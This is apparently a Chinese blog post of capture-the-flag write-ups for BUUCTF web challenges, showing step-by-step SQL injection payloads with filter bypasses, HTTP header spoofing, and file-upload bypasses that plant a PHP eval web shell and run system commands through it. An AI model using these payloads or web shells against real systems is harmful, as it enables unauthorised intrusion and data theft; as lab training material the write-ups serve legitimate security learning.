BUUCTFweb的一些wp(2)

[极客大挑战 2019]Knife

很明显,它直接提示我们菜刀了,直接用菜刀连一下就好了

在这里插入图片描述在这里插入图片描述然后在根目录下找到flag

在这里插入图片描述在这里插入图片描述

[极客大挑战 2019]LoveSQL

啊很明显的SQL注入,尝试下万能密码

1' or 1=1 #

在这里插入图片描述发现它给了用户名admin和密码,这个密码有点像16进制加密,尝试解密,但是没啥用
在这里插入图片描述于是我们继续思路,尝试order by看一下有多少列,发现只有3列

在这里插入图片描述确定有3列后,我们来测试下回显字段的位置

1' union select 1,2,3#

在这里插入图片描述可以看到2,3都可以作为回显,随便选一个就好,接下来我们来爆一下数据库名

1‘ union select 1,database(),3 #

在这里插入图片描述ok,这里我们知道了数据库为geek,接下来爆表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'geek' #

在这里插入图片描述可以看到有两个表,显然geekuser不是我们的目标,于是我们尝试爆后面这个奇奇怪怪的表(一般爆这种奇奇怪怪的准没错,就算出错再爆那个规规矩矩的嘛)

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name = 'l0ve1ysq1' #

在这里插入图片描述然后我们可以看到有id,username,password,ok,最后获取这三个字段就行啦

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

在这里插入图片描述这里要往右边多拉一会,因为作者载着理发店…

[极客大挑战 2019]Http

打开这个题,发现网页是很健康的绿色,然后左看看右看看上看看下看看发现啥都没有,打开源码康一下,果然有个Secret.php

在这里插入图片描述那就打开看看呗

在这里插入图片描述它说需要从这个地址访问,结合题目描述,懂了,抓包!

在这里插入图片描述我们添加一个

referer:https://Sycsecret.buuoj.cn

在这里插入图片描述然后他让我们用Syclover这个浏览器,我们再修改User-agent,把我们的浏览器换成它的

在这里插入图片描述然后它又说只能在本地访问,那我们再加一个

x-forwarded-for:127.0.0.1

在这里插入图片描述这下总算拿到flag了

[极客大挑战 2019]Upload

upload,直接告诉我们是文件上传了,那就抓包!上传!

在这里插入图片描述

啊,它提示我们没有图像,那就修改一下Content-Type,改成

image/jpeg

在这里插入图片描述提示我们这是php,哒咩!okok,那我们改个后缀,把php改成phtml试试

在这里插入图片描述ok,现在告诉我们不能有<?,那我们换一种🐎

<script language="php">eval($_GET['hack']);</script>

在这里插入图片描述这次它告诉我们这还不是图片,我们在🐎前面加上GIF89a来进行图像头文件欺骗

在这里插入图片描述这下ok了,我们直接刀它就可以拿到flag了
这里我遇到了一个问题,刀不好使了,发现没有返回数据,那除了刀,我们还可以自己来拿,只要切换到我们的🐎目录下,利用🐎来执行系统函数也是可以的,比如我这里是

http://67bcff20-d185-4419-841a-c8dd12ce712b.node4.buuoj.cn:81/upload/1.phtml?hack=system(%27ls%20/%27);

在这里插入图片描述
可以看到flag就在根目录下,于是我们直接cat /flag

http://67bcff20-d185-4419-841a-c8dd12ce712b.node4.buuoj.cn:81/upload/1.phtml?hack=system(%27cat%20/flag%27);

在这里插入图片描述

[ACTF2020 新生赛]Upload

又是一个文件上传题,直接抓包看看

在这里插入图片描述发现它前端直接就不让我们传非图片的文件,那简单,我们先改成图片形式的,然后再抓包改回来就好了

在这里插入图片描述哎,php被发现了,改成phtml试试

在这里插入图片描述ok,成啦,按照这个路径去刀就行,要是刀不上,就自己控制拿flag

[极客大挑战 2019]BabySQL

和之前一个系列的,老套路,先试试万能密码,发现不行,注意到提示说有过滤,这里我们可以小小的fuzz一下,看看过滤了些什么,经过fuzz发现or,and,select,from,union,where等都被过滤了,那么,有没有可能双写绕过呢,试一试

1' oorr 1=1 #

在这里插入图片描述发现成功绕过了,ok,那接下来也基本上和上面那道题一样了,但是这里需要注意双写,我把注入过程的语句贴在下面

1' ununionion seselectlect 1,2,database() #
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema = 'geek' #
1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' anandd table_name = 'b4bsql'#
1' ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

然后就拿到flag啦

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Purger

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值